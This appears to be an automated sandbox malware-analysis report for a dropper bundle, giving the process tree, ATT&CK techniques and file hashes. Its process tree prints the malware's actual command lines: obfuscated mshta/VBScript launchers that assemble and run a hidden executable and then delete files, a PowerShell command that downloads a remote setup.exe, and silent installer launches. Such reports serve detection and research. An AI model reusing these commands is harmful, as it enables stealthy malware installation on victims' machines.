"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8e69d46f8,0x7ff8e69d4708,0x7ff8e69d4718
11⤵
PID:13528

C:\Program Files (x86)\Gparted\gimagex.exe
"C:\Program Files (x86)\Gparted\gimagex.exe"
7⤵
- Executes dropped EXE
PID:5528

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu131398a3143fefd0.exe
4⤵
PID:3424

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu132a4e95bb26a065.exe
4⤵
PID:2028

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu133afc50de08.exe
4⤵
PID:2008

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu134eb4d923e.exe
4⤵
PID:4964

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu132a7b862a0b8c3.exe /mixtwo
4⤵
PID:3004

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu13559beef6a5272.exe
4⤵
PID:2740

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu138c8768d77029f.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:2120

C:\Users\Admin\AppData\Local\Temp\7zS039260E3\Thu13559beef6a5272.exe
Thu13559beef6a5272.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4844

C:\Users\Admin\AppData\Local\Temp\is-LERFL.tmp\Thu138c8768d77029f.tmp
"C:\Users\Admin\AppData\Local\Temp\is-LERFL.tmp\Thu138c8768d77029f.tmp" /SL5="$10204,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS039260E3\Thu138c8768d77029f.exe"
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3544

C:\Users\Admin\AppData\Local\Temp\7zS039260E3\Thu138c8768d77029f.exe
"C:\Users\Admin\AppData\Local\Temp\7zS039260E3\Thu138c8768d77029f.exe" /SILENT
2⤵
- Executes dropped EXE
PID:956

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /q /R tyPe "C:\Users\Admin\AppData\Local\Temp\7zS039260E3\Thu13ce386e385.exe" > ..\Kz4mLc.ExE&&Start ..\Kz4mLC.Exe -Pnxy5pXvI8SWjtAt3 & If "" =="" for %Y in ( "C:\Users\Admin\AppData\Local\Temp\7zS039260E3\Thu13ce386e385.exe" ) do taskkill -f /iM "%~nXY"
1⤵
PID:1576

C:\Users\Admin\AppData\Local\Temp\Kz4mLc.ExE
..\Kz4mLC.Exe -Pnxy5pXvI8SWjtAt3
2⤵
- Executes dropped EXE
PID:4768

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBscriPt: ClOsE (cReaTeObJECt ( "WsCRIpT.SHeLl" ).run("cMd /q /R tyPe ""C:\Users\Admin\AppData\Local\Temp\Kz4mLc.ExE"" > ..\Kz4mLc.ExE && Start ..\Kz4mLC.Exe -Pnxy5pXvI8SWjtAt3 & If ""-Pnxy5pXvI8SWjtAt3 "" =="""" for %Y in ( ""C:\Users\Admin\AppData\Local\Temp\Kz4mLc.ExE"" ) do taskkill -f /iM ""%~nXY"" " ,0,True ))
3⤵
PID:2852

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /q /R tyPe "C:\Users\Admin\AppData\Local\Temp\Kz4mLc.ExE" > ..\Kz4mLc.ExE&&Start ..\Kz4mLC.Exe -Pnxy5pXvI8SWjtAt3 & If "-Pnxy5pXvI8SWjtAt3 " =="" for %Y in ( "C:\Users\Admin\AppData\Local\Temp\Kz4mLc.ExE" ) do taskkill -f /iM "%~nXY"
4⤵
PID:2668

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VBscrIPt: cLosE (CreAtEobJECt ("wScRiPt.Shell"). rUn ( "C:\Windows\system32\cmd.exe /R eCho | sEt /p = ""MZ"" > kjDH_4NN.HcN & copy /y /B KjDH_4NN.HcN + OCbMK.P+ JWTDD.9 ..\YWdLrN.QC & START msiexec -Y ..\YwdlRn.qC &DeL /q * " , 0 , trUE ) )
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4396

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /R eCho | sEt /p = "MZ" >kjDH_4NN.HcN& copy /y /B KjDH_4NN.HcN + OCbMK.P+ JWTDD.9 ..\YWdLrN.QC &START msiexec -Y ..\YwdlRn.qC&DeL /q *
4⤵
PID:6024

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" eCho "
5⤵
PID:3532

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" sEt /p = "MZ" 1>kjDH_4NN.HcN"
5⤵
PID:1668

C:\Windows\SysWOW64\msiexec.exe
msiexec -Y ..\YwdlRn.qC
5⤵
- Loads dropped DLL
PID:5088

C:\Windows\SysWOW64\taskkill.exe
taskkill -f /iM "Thu13ce386e385.exe"
2⤵
- Kills process with taskkill
PID:2388

C:\Users\Admin\AppData\Local\Temp\is-Q1HP1.tmp\Thu138c8768d77029f.tmp
"C:\Users\Admin\AppData\Local\Temp\is-Q1HP1.tmp\Thu138c8768d77029f.tmp" /SL5="$20204,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS039260E3\Thu138c8768d77029f.exe" /SILENT
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
PID:1540

C:\Users\Admin\AppData\Local\Temp\is-2VK3G.tmp\winhostdll.exe
"C:\Users\Admin\AppData\Local\Temp\is-2VK3G.tmp\winhostdll.exe" ss1
2⤵
- Executes dropped EXE
PID:6084

C:\Users\Admin\AppData\Local\Temp\7zS039260E3\Thu13f11af06b.exe
C:\Users\Admin\AppData\Local\Temp\7zS039260E3\Thu13f11af06b.exe
1⤵
PID:3716

C:\Users\Admin\AppData\Local\Temp\7zS039260E3\Thu138c8768d77029f.exe
Thu138c8768d77029f.exe
1⤵
- Executes dropped EXE
PID:2420

C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\141d75ce47bf4f86bb43b12fc259598d /t 3236 /p 3232
1⤵
PID:5236

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
- Executes dropped EXE
PID:4792

C:\Windows\explorer.exe
explorer.exe
1⤵
- Enumerates connected drives
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:1064

C:\Users\Admin\AppData\Local\Temp\77F0.exe
C:\Users\Admin\AppData\Local\Temp\77F0.exe
2⤵
PID:4928

C:\Users\Admin\AppData\Local\Temp\77F0.exe
C:\Users\Admin\AppData\Local\Temp\77F0.exe
3⤵
PID:1044

C:\Users\Admin\AppData\Local\Temp\8D0F.exe
C:\Users\Admin\AppData\Local\Temp\8D0F.exe
2⤵
PID:5904

C:\Users\Admin\AppData\Local\Temp\8D0F.exe
C:\Users\Admin\AppData\Local\Temp\8D0F.exe
3⤵
PID:1644

C:\Users\Admin\AppData\Local\Temp\Epidotic.exe
"C:\Users\Admin\AppData\Local\Temp\Epidotic.exe"
4⤵
PID:7356

C:\Users\Admin\AppData\Local\Temp\Epidotic.exe
C:\Users\Admin\AppData\Local\Temp\Epidotic.exe
5⤵
PID:7900

C:\Users\Admin\AppData\Local\Temp\web-setup.exe
"C:\Users\Admin\AppData\Local\Temp\web-setup.exe"
4⤵
PID:7428

C:\Users\Admin\AppData\Local\Temp\is-B67SO.tmp\web-setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-B67SO.tmp\web-setup.tmp" /SL5="$800C6,903319,903168,C:\Users\Admin\AppData\Local\Temp\web-setup.exe"
5⤵
PID:7684

C:\Users\Admin\AppData\Local\Temp\web-setup.exe
"C:\Users\Admin\AppData\Local\Temp\web-setup.exe" /SILENT
6⤵
PID:7876

C:\Users\Admin\AppData\Local\Temp\is-JN17N.tmp\web-setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-JN17N.tmp\web-setup.tmp" /SL5="$300B4,903319,903168,C:\Users\Admin\AppData\Local\Temp\web-setup.exe" /SILENT
7⤵
PID:8156

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C ""C:\Users\Admin\AppData\Local\Packages\GData\v1-3\install.cmd""
8⤵
PID:8384

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Invoke-WebRequest -Uri https://ligree.com/dl/setup.exe -OutFile setup.exe
9⤵
PID:9044

C:\Users\Admin\AppData\Local\Temp\AF0F.exe
C:\Users\Admin\AppData\Local\Temp\AF0F.exe
2⤵
PID:3128

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3128 -s 272
3⤵
- Program crash
PID:6960

C:\Users\Admin\AppData\Local\Temp\F57F.exe
C:\Users\Admin\AppData\Local\Temp\F57F.exe
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5420

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5420 -s 276
3⤵
- Program crash
PID:7984

C:\Users\Admin\AppData\Local\Temp\ABE.exe
C:\Users\Admin\AppData\Local\Temp\ABE.exe
2⤵
PID:5700

C:\Users\Admin\AppData\Local\Temp\ABE.exe
C:\Users\Admin\AppData\Local\Temp\ABE.exe
3⤵
PID:11596

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 5444 -ip 5444
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:572

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:5300

C:\Program Files (x86)\Company\NewProduct\rtst1039.exe
"C:\Program Files (x86)\Company\NewProduct\rtst1039.exe"
2⤵
- Executes dropped EXE
PID:3944

C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe
"C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"
2⤵
- Executes dropped EXE
PID:1584

C:\Program Files (x86)\Company\NewProduct\inst2.exe
"C:\Program Files (x86)\Company\NewProduct\inst2.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2876

C:\Users\Admin\AppData\Local\Temp\is-Q8BR8.tmp\lakazet.exe
"C:\Users\Admin\AppData\Local\Temp\is-Q8BR8.tmp\lakazet.exe" /S /UID=2709
3⤵
- Executes dropped EXE
PID:1960

C:\Users\Admin\AppData\Local\Temp\8c-83ec8-3fc-d07a3-e88eb9e60df54\Saduloxuco.exe
"C:\Users\Admin\AppData\Local\Temp\8c-83ec8-3fc-d07a3-e88eb9e60df54\Saduloxuco.exe"
4⤵
PID:3224

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
5⤵
PID:7324

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ff8e69d46f8,0x7ff8e69d4708,0x7ff8e69d4718
6⤵
PID:7408

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2228,17913536118621841938,17266890416666535115,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2236 /prefetch:2
6⤵
PID:8392

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2228,17913536118621841938,17266890416666535115,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2288 /prefetch:3
6⤵
PID:8496

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2228,17913536118621841938,17266890416666535115,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2776 /prefetch:8
6⤵
PID:8548

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,17913536118621841938,17266890416666535115,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3216 /prefetch:1
6⤵
PID:8768

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,17913536118621841938,17266890416666535115,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3224 /prefetch:1
6⤵
PID:8940

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,17913536118621841938,17266890416666535115,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5028 /prefetch:1
6⤵
PID:10276

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,17913536118621841938,17266890416666535115,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5288 /prefetch:1
6⤵
PID:10556

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,17913536118621841938,17266890416666535115,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5312 /prefetch:1
6⤵
PID:10632

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2228,17913536118621841938,17266890416666535115,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5688 /prefetch:8
6⤵
PID:11344

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2228,17913536118621841938,17266890416666535115,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5688 /prefetch:8
6⤵
PID:11548

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,17913536118621841938,17266890416666535115,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3756 /prefetch:1
6⤵
PID:13608

C:\Users\Admin\AppData\Local\Temp\3f-fd371-107-eaf88-c7bdef63d483f\Mylavaeshili.exe
"C:\Users\Admin\AppData\Local\Temp\3f-fd371-107-eaf88-c7bdef63d483f\Mylavaeshili.exe"
4⤵
PID:4132

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\n3zluxzp.ine\installer.exe /qn CAMPAIGN="654" & exit
5⤵
PID:8064

C:\Users\Admin\AppData\Local\Temp\n3zluxzp.ine\installer.exe
C:\Users\Admin\AppData\Local\Temp\n3zluxzp.ine\installer.exe /qn CAMPAIGN="654"
6⤵
PID:8672

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2ayi5asv.35r\any.exe & exit
5⤵
PID:8256

C:\Users\Admin\AppData\Local\Temp\2ayi5asv.35r\any.exe
C:\Users\Admin\AppData\Local\Temp\2ayi5asv.35r\any.exe
6⤵
PID:8816

C:\Users\Admin\AppData\Local\Temp\2ayi5asv.35r\any.exe
"C:\Users\Admin\AppData\Local\Temp\2ayi5asv.35r\any.exe" -u
7⤵
PID:9716

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hjr3lcgf.z1o\autosubplayer.exe /S & exit
5⤵
PID:8460

C:\Users\Admin\AppData\Local\Temp\VPYZBUMWID\foldershare.exe
"C:\Users\Admin\AppData\Local\Temp\VPYZBUMWID\foldershare.exe" /VERYSILENT
4⤵
PID:3724

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1640

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 5364 -ip 5364
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4320

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 780 -p 5420 -ip 5420
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5716

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 752 -p 5436 -ip 5436
1⤵
PID:4560

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 728 -p 5396 -ip 5396
1⤵
PID:3260

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 3932 -ip 3932
1⤵
PID:3632

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 788 -p 5664 -ip 5664
1⤵
PID:3400

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 696 -p 5404 -ip 5404
1⤵
PID:3300

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 1272 -ip 1272
1⤵
PID:2276

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 676 -p 5356 -ip 5356
1⤵
PID:1532

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 3624 -ip 3624
1⤵
PID:3400

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe" -ServerName:CortanaUI.AppXstmwaab17q5s3y22tp6apqz7a45vwv65.mca
1⤵
PID:4040

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
- Executes dropped EXE
PID:5396

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:5556

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:5516

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 744 -p 1236 -ip 1236
1⤵
PID:2680

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 756 -p 4864 -ip 4864
1⤵
PID:2164

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 748 -p 3128 -ip 3128
1⤵
PID:6808

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 5420 -ip 5420
1⤵
PID:7736

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
PID:8448

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding FE1A57CF50799F5478BCA770FAEFB09B C
2⤵
PID:9468

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding C2FB799621B1A8AD1EBBE9F791338CC0
2⤵
PID:11220

C:\Windows\SysWOW64\taskkill.exe
"C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
3⤵
- Kills process with taskkill
PID:11472

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 26173385890D57657483996AF58456DF E Global\MSI0000
2⤵
PID:12840

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:9188

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
1⤵
PID:11368

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

BITS Jobs

T1197

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

Virtualization/Sandbox Evasion

T1497

BITS Jobs

T1197

Install Root Certificate

T1130

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

System Information Discovery

T1082

Peripheral Device Discovery

T1120

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\7zS039260E3\Thu13045a98310.exe
MD5
03fd2dc00f7d0692010f40a7068549fe

SHA1
4b49f5beaf65f4718034d4049867c41fb4c2109f

SHA256
edcc93671ea67eed0d4688c92670be18f9386cd8971da66cff4a1564c5c8f054

SHA512
2b0c6d6c0a670b8747be58712972b2021f0dd253feaa4130c72a9b3ea8fa8250f5459d0869063d79626fd5551f04aa7844a8d5a818c32bf14eedd8869cedf058

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS039260E3\Thu131398a3143fefd0.exe
MD5
2a2be74372dc3a5407cac8800c58539b

SHA1
17ecc1e3253772cdf62ef21741336f3707ed2211

SHA256
2b8b9dd101fc57f8d10ce4f074c0005df955634dbb7d9e49465f9054d66628a9

SHA512
ce65803bfad71d248ce190a46846500a0ba637dca7909a25aab8b4f35d50a050722739e15b7e076881c026b7b6daf582d81069f6df948c0671f316239a221d68

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS039260E3\Thu132a4e95bb26a065.exe
MD5
279f10214e35b794dbffa3025ecb721f

SHA1
ddfca6d15eb530213148e044c11edd37f6d6c212

SHA256
7f210f9961b8ba954050558fa4b85120c876d304aae0d3edbb6576f0fa2661be

SHA512
069e0720289c49cf206f7636d0f028d9e777fa273595b84fa4edfa66b92bef5c0dd8ba2fed2beb9a3f145b40909430fa9900484e630928db9d1e9018198829d7

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS039260E3\Thu132a7b862a0b8c3.exe
MD5
681089ab3990a94607696cc0cadc2d70

SHA1
2098c57e821024bf5cd5a90ee2c767ef55a09e9d

SHA256
53841e32d91d94f8b3e273d34625cedf81bc1458ab9c1efbf4de429e6b3ebf4b

SHA512
5ee69a129b441675e75bcc66afae89a73f764d14f48cd0b6b1514537a3ae8efe185ba4273e288f9bf6092c11be309807bb3933bf0ca98d4a54051f2d5609270e

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS039260E3\Thu133afc50de08.exe
MD5
85346cbe49b2933a57b719df00196ed6

SHA1
644de673dc192b599a7bb1eaa3f6a97ddd8b9f0d

SHA256
45ed5fbac043165057280feac2c2b8afcf9981b5c1b656aa4bf1c03cf3144d42

SHA512
89f01bff5c874e77d7d4512ba787dd760ec81b2e42d8fe8430ca5247f33eed780c406dcd7f0f763a66fb0d20009357e93275fabeef4475fc7d08cd42cddb8cce

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS039260E3\Thu133bd09ec4755.exe
MD5
7d7f14a1b3b8ee4e148e82b9c2f28aed

SHA1
649a29887915908dfba6bbcdaed2108511776b5a

SHA256
623a56a34174f3dcb179796205294124918996ccc8b56062b419ab8354df35cb

SHA512
585dda13cda86d077d28cdfbe799d4356967394e09a17e3ce406f557d14ec24f6b6cbdf0a7b2beaaae8743b2c545b898a12eeeeb56579b8fa560202a290370d3

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS039260E3\Thu134eb4d923e.exe
MD5
0b1822dd255983709c5d00fe00f4602e

SHA1
0778ca9d8bd7d1cf80c07e814f60850e47e3f1fe

SHA256
60fe40c8440a17b60ec0088f1889a107e98479ab0c6dfed790658762eed3828b

SHA512
e1b654a233b46c670f9d72cf2eb29fe2aa2ea1ea3d1770c6f5e97da11e6b3345f7dc098204fd1ad7bfcb9c44055d26ef1d67766263064b4f7a2013a822b39460

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS039260E3\Thu13559beef6a5272.exe
MD5
7f4a28219248edaabd3fc6baa232aea4

SHA1
aaa27954c3d40391982ffa128b4f2c7d9ac44b29

SHA256
e1aedabe73507395e9d8c7fc9d4a35133752aae237a725f3ff2664ca0da6e348

SHA512
dea18d7d23d4985e036ec3bfcf4784e0524fce8ede0eeef24a9c21a860430a350fac34bdef1cf62100e072ca26e8039db28c809e2f4d8cfe4974ef66c813ebb0

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS039260E3\Thu13559beef6a5272.exe
MD5
7f4a28219248edaabd3fc6baa232aea4

SHA1
aaa27954c3d40391982ffa128b4f2c7d9ac44b29

SHA256
e1aedabe73507395e9d8c7fc9d4a35133752aae237a725f3ff2664ca0da6e348

SHA512
dea18d7d23d4985e036ec3bfcf4784e0524fce8ede0eeef24a9c21a860430a350fac34bdef1cf62100e072ca26e8039db28c809e2f4d8cfe4974ef66c813ebb0

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS039260E3\Thu138c8768d77029f.exe
MD5
314e3dc1f42fb9d858d3db84deac9343

SHA1
dec9f05c3bcc759b76f4109eb369db9c9666834b

SHA256
79133c9e1cdfdfada9bc3d49ba30d872c91383eb7515302cd7bd2e1c5b983b08

SHA512
23f6c8f785c6d59d976d437732d1ea5968403239c5f8c3ca83983d1a0b3d9f8426803b7de7c2e819d16a1fb35f9e24461593fdcc75cd81ddc0076c22ed1e45f2

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS039260E3\Thu138c8768d77029f.exe
MD5
314e3dc1f42fb9d858d3db84deac9343

SHA1
dec9f05c3bcc759b76f4109eb369db9c9666834b

SHA256
79133c9e1cdfdfada9bc3d49ba30d872c91383eb7515302cd7bd2e1c5b983b08

SHA512
23f6c8f785c6d59d976d437732d1ea5968403239c5f8c3ca83983d1a0b3d9f8426803b7de7c2e819d16a1fb35f9e24461593fdcc75cd81ddc0076c22ed1e45f2

Download Submit
